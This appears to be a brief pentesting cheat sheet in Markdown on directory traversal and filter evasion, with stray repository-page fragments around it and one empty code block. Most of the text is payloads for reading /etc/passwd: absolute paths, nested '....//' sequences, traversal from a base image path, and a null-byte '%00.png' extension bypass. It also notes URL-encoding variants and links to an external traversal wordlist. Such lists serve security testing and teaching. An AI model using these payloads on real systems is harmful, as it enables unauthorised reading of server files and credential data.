33 lines
674 B
Markdown
33 lines
674 B
Markdown
|
|
||
|
|
## Directory Traversal Injection Technique & Evasion
|
||
|
|
|
||
|
|
- Common
|
||
|
|
```
|
||
|
|
|
||
|
|
```
|
||
|
|
|
||
|
|
- Bypass
|
||
|
|
```
|
||
|
|
#Use an absolute path
|
||
|
|
filename=/etc/passwd
|
||
|
|
|
||
|
|
#Use nested traversal
|
||
|
|
....// or
|
||
|
|
....\/
|
||
|
|
|
||
|
|
#Utilize URL Encoding
|
||
|
|
- 16-bit
|
||
|
|
- Double URL
|
||
|
|
- UTF-8
|
||
|
|
|
||
|
|
#Burp Suite Professional
|
||
|
|
§ Contains encoded path traversal sequences
|
||
|
|
|
||
|
|
#Start with the base file and traverse from there
|
||
|
|
filename=/var/www/images/../../../etc/passwd
|
||
|
|
|
||
|
|
#Bypass the requirement to end with a file extension by using a null byte
|
||
|
|
filename=../../../etc/passwd%00.png
|
||
|
|
```
|
||
|
|
|
||
|
|
- Wordlists ---> https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
|